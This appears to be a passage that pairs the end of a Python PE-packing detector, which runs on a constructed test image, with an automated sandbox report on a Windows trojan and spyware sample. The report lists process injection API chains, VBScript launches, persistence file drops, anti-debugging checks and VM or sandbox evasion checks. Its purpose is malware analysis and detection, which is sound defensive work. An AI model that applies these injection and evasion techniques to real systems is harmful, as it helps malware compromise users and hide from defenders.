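    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out = []
    for k in range(n_sections):
        hdr = table + 40 * k
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        out.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return out


def analyse_pe(pe: bytes) -> Dict:
    sections = [
        {"name": n, "raw_size": len(d), "zlib_complexity": round(zlib_complexity(d), 4)}
        for n, d in parse_sections(pe)
    ]
    names = {s["name"] for s in sections}
    return {
        "sections": sections,
        "upx_section_names": bool(names & UPX_SECTION_NAMES),
        "packed_sections": [
            s["name"] for s in sections
            if s["name"] != ".text" and s["zlib_complexity"] > PACKED_THRESHOLD
        ],
    }


def build_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Construct a minimal PE32 image for testing: DOS header, COFF header,
    zeroed optional header, section table, 512-byte aligned raw data."""
    e_lfanew, opt_size = 0x40, 0xE0
    header_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = (header_end + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table, blobs, va = b"", b"", 0x1000
    for name, data in sections:
        raw_ptr = first_raw + len(blobs) if data else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), max(len(data), 0x1000), va,
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data + b"\0" * ((-len(data)) % 0x200)
        va += ((len(data) or 1) + 0xFFF) & ~0xFFF
    headers = dos + b"PE\0\0" + coff + optional + table
    return headers + b"\0" * (first_raw - len(headers)) + blobs


# Constructed image (not the sample): an empty UPX0, an incompressible UPX1
# (a SHA-256 output stream) and a highly repetitive .rsrc.
SAMPLE_PE = build_pe([
    ("UPX0", b""),
    ("UPX1", b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))),
    (".rsrc", (b"RT_ICON\0" + bytes(range(24))) * 128),
])

if __name__ == "__main__":
    import json
    print(json.dumps(analyse_pe(SAMPLE_PE), indent=2))
```

On a real dropped file, pass the file bytes to analyse_pe(); section names are trivially renamed by a packer, so the per-section ratio is the more durable of the two signals.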
Classification label
Source: classification engine | Classification label: mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
Contains functionality for error logging
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0042212C GetLastError,FormatMessageA
Contains functionality to check free disk space
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_004093C0 GetDiskFreeSpaceA
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C83A54 CreateToolhelp32Snapshot,Process32FirstW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,Process32NextW,CloseHandle
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8406C FindResourceW,SizeofResource,LoadResource,LockResource,FreeResource
Creates files inside the user directory
Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe
Creates temporary files
Source: C:\Users\user\Desktop\sxz.exe | File created: C:\Users\user~1\AppData\Local\Temp\ope641.tmp
Executable is probably coded in java
Source: C:\Users\user\Desktop\sxz.exe | Section loaded: C:\Program Files\Java\jre1.8.0_40\bin\java.dll
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe (reported 8 times)
Parts of this application are using Borland Delphi (Probably coded in Delphi)
Source: C:\Users\user\Desktop\sxz.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales (reported twice)
Reads ini files
Source: C:\Users\user\Desktop\sxz.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\sxz.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: sxz.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\sxz.exe 'C:\Users\user\Desktop\sxz.exe'
Source: unknown | Process created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe'
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Source: unknown | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknown | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknown | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exe
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe'
Source: C:\Users\user\Desktop\sxz.exe | Process created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process created: unknown unknown (reported 5 times)
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\sxz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dllJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Submission file is bigger than most known malware samplesShow sources
Source: sxz.exeStatic file information: File size 2297344 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeFile opened: C:\Program Files\Java\jre1.8.0_40\bin\msvcr100.dllJump to behavior
PE file has a big raw sectionShow sources
Source: sxz.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x22fa00

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: C:\Windows\System32\svchost.exe base: C80000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and write
Source: C:\Windows\InstallDir\Server.exe Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread, 3_2_00C84600
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 3_2_00C83CE4
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 3_1_00C83CE4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 5_2_00C83CE4
Source: C:\Program Files\Internet Explorer\iexplore.exe Code function: 6_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 6_2_00C83CE4
Source: C:\Windows\InstallDir\Server.exe Code function: 15_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 15_2_00C83CE4
Source: C:\Windows\InstallDir\Server.exe Code function: 15_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 15_1_00C83CE4
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\server.exe Thread created: C:\Windows\System32\svchost.exe EIP: C88EF8
Source: C:\Users\user\AppData\Local\Temp\server.exe Thread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0
Source: C:\Windows\InstallDir\Server.exe Thread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\sxz.exe Memory written: C:\Users\user\Desktop\sxz.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory written: C:\Windows\System32\svchost.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe Memory written: C:\Users\user\AppData\Local\Temp\358saxio.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\InstallDir\Server.exe Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe Memory written: C:\Users\user\AppData\Local\Temp\358saxio.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\sxz.exe Thread register set: target process: 3624
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe Thread register set: target process: 2184
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe Thread register set: target process: 2280
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory written: C:\Windows\System32\svchost.exe base: C80000
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000
Source: C:\Windows\InstallDir\Server.exe Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe File opened: C:\Windows\WinSxS\FileMaps\program_files_java_jre1.8.0_40_bin_dc0a9e79a9a08fab.cdf-ms
Source: C:\Windows\explorer.exe File opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_78530b0c641b30d5.cdf-ms
Source: C:\Windows\explorer.exe File opened: C:\Windows\WinSxS\FileMaps\$$_installdir_1a6c4aae522d2aa2.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Program Files\Internet Explorer\iexplore.exe Process queried: DebugPort
Source: C:\Program Files\Internet Explorer\iexplore.exe Process queried: DebugPort
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary, 3_2_00C83D8C
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C88674 mov eax, dword ptr fs:[00000030h] 3_2_00C88674
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C88760 mov eax, dword ptr fs:[00000030h] 3_2_00C88760
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C886CC mov eax, dword ptr fs:[00000030h] 3_2_00C886CC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_1_00C88674 mov eax, dword ptr fs:[00000030h] 3_1_00C88674
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_1_00C88760 mov eax, dword ptr fs:[00000030h] 3_1_00C88760
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_1_00C886CC mov eax, dword ptr fs:[00000030h] 3_1_00C886CC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C88674 mov eax, dword ptr fs:[00000030h] 5_2_00C88674
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C88760 mov eax, dword ptr fs:[00000030h] 5_2_00C88760
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C886CC mov eax, dword ptr fs:[00000030h] 5_2_00C886CC
Source: C:\Program Files\Internet Explorer\iexplore.exe Code function: 6_2_00C88674 mov eax, dword ptr fs:[00000030h] 6_2_00C88674
Source: C:\Program Files\Internet Explorer\iexplore.exe Code function: 6_2_00C88760 mov eax, dword ptr fs:[00000030h] 6_2_00C88760
Source: C:\Program Files\Internet Explorer\iexplore.exe Code function: 6_2_00C886CC mov eax, dword ptr fs:[00000030h] 6_2_00C886CC
Source: C:\Windows\explorer.exe Code function: 14_1_01B88674 mov eax, dword ptr fs:[00000030h] 14_1_01B88674
Source: C:\Windows\explorer.exe Code function: 14_1_01B88760 mov eax, dword ptr fs:[00000030h] 14_1_01B88760
Source: C:\Windows\explorer.exe Code function: 14_1_01B886CC mov eax, dword ptr fs:[00000030h] 14_1_01B886CC
Source: C:\Windows\InstallDir\Server.exe Code function: 15_2_00C88674 mov eax, dword ptr fs:[00000030h] 15_2_00C88674
Source: C:\Windows\InstallDir\Server.exe Code function: 15_2_00C88760 mov eax, dword ptr fs:[00000030h] 15_2_00C88760
Source: C:\Windows\InstallDir\Server.exe Code function: 15_2_00C886CC mov eax, dword ptr fs:[00000030h] 15_2_00C886CC
Source: C:\Windows\InstallDir\Server.exe Code function: 15_1_00C88674 mov eax, dword ptr fs:[00000030h] 15_1_00C88674
Source: C:\Windows\InstallDir\Server.exe Code function: 15_1_00C88760 mov eax, dword ptr fs:[00000030h] 15_1_00C88760
Source: C:\Windows\InstallDir\Server.exe Code function: 15_1_00C886CC mov eax, dword ptr fs:[00000030h] 15_1_00C886CC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 3_2_00C823E8 GetProcessHeap,GetCurrentThreadId, 3_2_00C823E8
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe Memory protected: page read and write and page guard

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\InstallDir\Server.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\server.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_3-9517
Source: C:\Users\user\AppData\Local\Temp\server.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_3-9564
Source: C:\Windows\System32\svchost.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_5-9467
Source: C:\Windows\InstallDir\Server.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Program Files\Internet Explorer\iexplore.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_6-9701
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\server.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_3-10272
Source: C:\Windows\InstallDir\Server.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes and other dynamic analysis tools (process name or module)
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exe Binary or memory string: SBIEDLL.DLL
Tries to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: VBoxService.exe VBoxService.exe 3_2_00C881BC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: VBoxService.exe VBoxService.exe 3_1_00C881BC
Source: C:\Windows\System32\svchost.exe Code function: VBoxService.exe VBoxService.exe 5_2_00C881BC
Source: C:\Program Files\Internet Explorer\iexplore.exe Code function: VBoxService.exe VBoxService.exe 6_2_00C881BC
Source: C:\Windows\InstallDir\Server.exe Code function: VBoxService.exe VBoxService.exe 15_2_00C881BC
Source: C:\Windows\InstallDir\Server.exe Code function: VBoxService.exe VBoxService.exe 15_1_00C881BC
Enumerates the file system
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 834
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 627
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
